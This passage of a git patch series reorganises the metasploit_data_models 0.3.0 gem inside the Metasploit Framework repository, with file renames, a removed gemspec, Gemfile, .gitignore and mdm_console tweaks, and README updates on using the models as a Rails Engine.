--git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_mixin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_platform.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/nexpose_console.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/note.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/profile.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report_template.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/route.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/service.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session_event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/task.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_form.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_page.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_site.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_request.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/workspace.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec deleted file mode 100644 index 1ad87bcca0..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec +++ /dev/null @@ -1,25 +0,0 @@ -# -*- encoding: utf-8 -*- -$:.push File.expand_path("../lib", __FILE__) -require "metasploit_data_models/version" - -Gem::Specification.new do |s| - s.name = "metasploit_data_models" - s.version = "0.0.2.43DEV" # This gemspec is linked to metasploit releases and follows trunk - s.authors = ["Trevor Rosen"] - s.email = ["trevor_rosen@rapid7.com"] - s.homepage = "" - s.summary = %q{Database code for MSF and Metasploit Pro} - s.description = %q{Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions.} - - s.files = `git ls-files`.split("\n") - s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n") - s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) } - s.require_paths = ["lib"] - - # ---- Dependencies ---- - s.add_development_dependency "rspec" - s.add_runtime_dependency "activerecord" - s.add_runtime_dependency "activesupport" - s.add_runtime_dependency "pg" - s.add_runtime_dependency "pry" -end From a745c3a4a019a1c55178cf90fe1c63fc2d747395 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Thu, 1 Nov 2012 08:56:00 -0500 Subject: [PATCH 50/64] metasploit_data_models 0.3.0 installed in gemcache --- lib/gemcache/ruby/1.9.1/bin/mdm_console | 10 +- .../metasploit_data_models-0.3.0/.gitignore | 18 +- .../gems/metasploit_data_models-0.3.0/Gemfile | 6 + .../metasploit_data_models-0.3.0/README.md | 65 +- .../metasploit_data_models-0.3.0/Rakefile | 8 +- .../app/models/mdm/api_key.rb | 30 +- .../app/models/mdm/client.rb | 15 +- .../app/models/mdm/cred.rb | 148 ++- .../app/models/mdm/cred_file.rb | 12 +- .../app/models/mdm/event.rb | 36 +- .../app/models/mdm/exploit_attempt.rb | 20 +- .../app/models/mdm/exploited_host.rb | 18 +- .../app/models/mdm/host.rb | 1184 ++--------------- .../app/models/mdm/host_detail.rb | 21 +- .../app/models/mdm/host_tag.rb | 19 +- .../app/models/mdm/imported_cred.rb | 13 +- .../app/models/mdm/listener.rb | 30 +- .../app/models/mdm/loot.rb | 78 +- .../app/models/mdm/macro.rb | 25 +- .../app/models/mdm/mod_ref.rb | 7 +- .../app/models/mdm/module_action.rb | 23 +- .../app/models/mdm/module_arch.rb | 24 +- .../app/models/mdm/module_author.rb | 24 +- .../app/models/mdm/module_detail.rb | 124 +- .../app/models/mdm/module_mixin.rb | 24 +- .../app/models/mdm/module_platform.rb | 24 +- .../app/models/mdm/module_ref.rb | 24 +- .../app/models/mdm/module_target.rb | 24 +- .../app/models/mdm/nexpose_console.rb | 28 +- .../app/models/mdm/note.rb | 65 +- .../app/models/mdm/profile.rb | 13 +- .../app/models/mdm/ref.rb | 20 +- .../app/models/mdm/report.rb | 59 +- .../app/models/mdm/report_template.rb | 35 +- .../app/models/mdm/route.rb | 14 +- .../app/models/mdm/service.rb | 82 +- .../app/models/mdm/session.rb | 61 +- .../app/models/mdm/session_event.rb | 13 +- .../app/models/mdm/tag.rb | 59 +- .../app/models/mdm/task.rb | 51 +- .../app/models/mdm/user.rb | 43 +- .../app/models/mdm/vuln.rb | 78 +- .../app/models/mdm/vuln_attempt.rb | 21 +- .../app/models/mdm/vuln_detail.rb | 20 +- .../app/models/mdm/vuln_ref.rb | 19 +- .../app/models/mdm/web_form.rb | 21 +- .../app/models/mdm/web_page.rb | 21 +- .../app/models/mdm/web_site.rb | 74 +- .../app/models/mdm/web_vuln.rb | 21 +- .../app/models/mdm/wmap_request.rb | 7 +- .../app/models/mdm/wmap_target.rb | 7 +- .../app/models/mdm/workspace.rb | 331 ++--- .../bin/mdm_console | 4 +- .../metasploit_data_models-0.3.0/lib/mdm.rb | 12 + .../host/operating_system_normalization.rb | 984 ++++++++++++++ .../lib/metasploit_data_models.rb | 95 +- .../lib/metasploit_data_models/engine.rb | 7 + .../lib/metasploit_data_models/version.rb | 6 +- .../metasploit_data_models.gemspec | 11 +- .../metasploit_data_models-0.3.0/script/rails | 8 + .../spec/dummy/Rakefile | 7 + .../app/assets/javascripts/application.js | 15 + .../app/assets/stylesheets/application.css | 13 + .../app/controllers/application_controller.rb | 3 + .../dummy/app/helpers/application_helper.rb | 2 + .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../app/views/layouts/application.html.erb | 14 + .../spec/dummy/config.ru | 4 + .../spec/dummy/config/application.rb | 61 + .../spec/dummy/config/boot.rb | 10 + .../spec/dummy/config/database.yml.example | 22 + .../spec/dummy/config/environment.rb | 5 + .../dummy/config/environments/development.rb | 37 + .../dummy/config/environments/production.rb | 67 + .../spec/dummy/config/environments/test.rb | 37 + .../initializers/backtrace_silencers.rb | 7 + .../dummy/config/initializers/inflections.rb | 15 + .../dummy/config/initializers/mime_types.rb | 5 + .../dummy/config/initializers/secret_token.rb | 7 + .../config/initializers/session_store.rb | 8 + .../config/initializers/wrap_parameters.rb | 14 + .../spec/dummy/config/routes.rb | 2 + .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 26 + .../spec/dummy/public/422.html | 26 + .../spec/dummy/public/500.html | 25 + .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 6 + .../spec/spec_helper.rb | 25 +- .../metasploit_data_models-0.3.0.gemspec | 12 +- lib/msf/core/db_manager.rb | 2 +- 93 files changed, 2860 insertions(+), 1961 deletions(-) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails diff --git a/lib/gemcache/ruby/1.9.1/bin/mdm_console b/lib/gemcache/ruby/1.9.1/bin/mdm_console index 058ee70cb0..7c56696959 100755 --- a/lib/gemcache/ruby/1.9.1/bin/mdm_console +++ b/lib/gemcache/ruby/1.9.1/bin/mdm_console @@ -10,13 +10,9 @@ require 'rubygems' version = ">= 0" -if ARGV.first - str = ARGV.first - str = str.dup.force_encoding("BINARY") if str.respond_to? :force_encoding - if str =~ /\A_(.*)_\z/ - version = $1 - ARGV.shift - end +if ARGV.first =~ /^_(.*)_$/ and Gem::Version.correct? $1 then + version = $1 + ARGV.shift end gem 'metasploit_data_models', version diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore index ce11416a69..e5b2a024e4 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore @@ -1,6 +1,18 @@ -.rvmrc -.DS_Store -*.gem +# bundler configuration .bundle +# Mac OS X folder attributes +.DS_Store +# built gems +*.gem +# Rubymine project configuration +.idea +# Don't check in rvmrc since this is a gem +.rvmrc +# Installed gem versions. Not stored for the same reasons as .rvmrc Gemfile.lock +# Packaging directory for builds pkg/* +# Database configuration (with passwords) for specs +spec/dummy/config/database.yml +# logs +*.log diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile index 5749f0cec1..b72e01d066 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile @@ -2,3 +2,9 @@ source "http://rubygems.org" # Specify your gem's dependencies in metasploit_data_models.gemspec gemspec + +group :test do + # rails is only used for testing with a dummy application in spec/dummy + gem 'rails' + gem 'rspec-rails' +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md index 1ab96c8212..0df7b8b712 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md @@ -17,35 +17,48 @@ __MetasploitDataModels__ exists to do several key things: ### Rails -In a Rails application we simply include the ActiveRecord mixins directly, usually inside models with similar names. +In a Rails application, MetasploitDataModels acts a +[Rails Engine](http://edgeapi.rubyonrails.org/classes/Rails/Engine.html) and the models are available to application +just as if they were defined under app/models. If your Rails appliation needs to modify the models, this can be done +using ActiveSupport.on_load hooks in initializers. The block passed to on_load hook is evaluated in the context of the +model class, so defining method and including modules will work just like reopeninng the class, but +ActiveSupport.on_load ensures that the monkey patches will work after reloading in development mode. Each class has a +different on_load name, which is just the class name converted to an underscored symbol, so Mdm::ApiKey runs the +:mdm_api_key load hooks, etc. -### MSF -When MetasploitDataModels is included by MSF, the gem dynamically creates -ActiveRecord model classes. + # Gemfile + gem :metasploiit_data_models, :git => git://github.com/rapid7/metasploit_data_models.git, :tag => 'v0.3.0' -Both of these behaviors are based on the assumption that the files in -__lib/metasploit_data_models/active_record_models__, though implemented here as -mixins, actually represent the basic ActiveRecord model structure that both Metasploit Framework and Metasploit Pro use. + # config/initializers/metasploit_data_models.rb + ActiveSupport.on_load(:mdm_api_key) do + # Returns the String obfuscated token for display. Meant to avoid CSRF + # api-key stealing attackes. + def obfuscated_token + token[0..3] + "****************************" + end + end + +### Metasploit Framework + +In Metasploit Framework, `MetasploitDataModels.require_models` is called by the `Msf::DbManager` to use the data models +only if the user wants to use the database. ### Elsewhere -__NOTE: This isn't in RubyGems yet. Using a Gemfile entry pointing to this repo (i.e., using [Bundler](http://gembundler.com)) is the suggested option for now.__ +__NOTE: This isn't in RubyGems yet. Using a Gemfile entry pointing to this repo (i.e., using +[Bundler](http://gembundler.com)) is the suggested option for now.__ +Usage outside of Rapid7 is still alpha, as reflected in the pre-1.0.0 version, and we're not making many promises. That +being said, usage is easy: -Usage outside of Rapid7 is still alpha, and we're not making many promises. That being said, usage is easy: - -```ruby -connection_info = YAML.load_file("path/to/rails-style/db_config_file") -ActiveRecord::Base.establish_connection(connection_info['development']) -include MetasploitDataModels -MetasploitDataModels.create_and_load_ar_classes -``` + connection_info = YAML.load_file("path/to/rails-style/db_config_file") + ActiveRecord::Base.establish_connection(connection_info['development']) + MetasploitDataModels.require_models Basically you need to do the following things: 1. Establish an ActiveRecord connection. A Rails __config/database.yml__ is ideal for this. -2. Include the MetasploitDataModels module. -3. Call the class method that builds the AR models into the Mdm namespace( __MetasploitDataModels.create_and_load_ar_classes__ ). +2. `MetasploitDataModels.require_models` ## Developer Info @@ -57,19 +70,3 @@ Give it a path to a working MSF database.yml file for full ActiveRecord-based access to your data. __Note:__ "development" mode is hardcoded into the console currently. - -### ActiveRecord::ConnectionError issues -Because the gem is defining mixins, there can be no knowledge of the -specifics of any "current" ActiveRecord connection. But if ActiveRecord -encounters something in a child class that would require knowledge of -the connection adapter (e.g. the use of an RDBMS-specific function in -a named scope's "WHERE" clause), it will check to see if the adapter -supports it and then throw an exception when the connection object -(which provides the adapter) is nil. - -This means that, for all but the most trivial cases, you need to use Arel -versions of queries instead of ones utilizing straight SQL. - -You'll encounter this sometimes if you do dev work on this gem. A good -rule of thumb: anything that goes into the class_eval block must be able -to work without knowledge of the AR connection adapter type. diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile index 29955274e0..ccea92f08e 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile @@ -1 +1,7 @@ -require 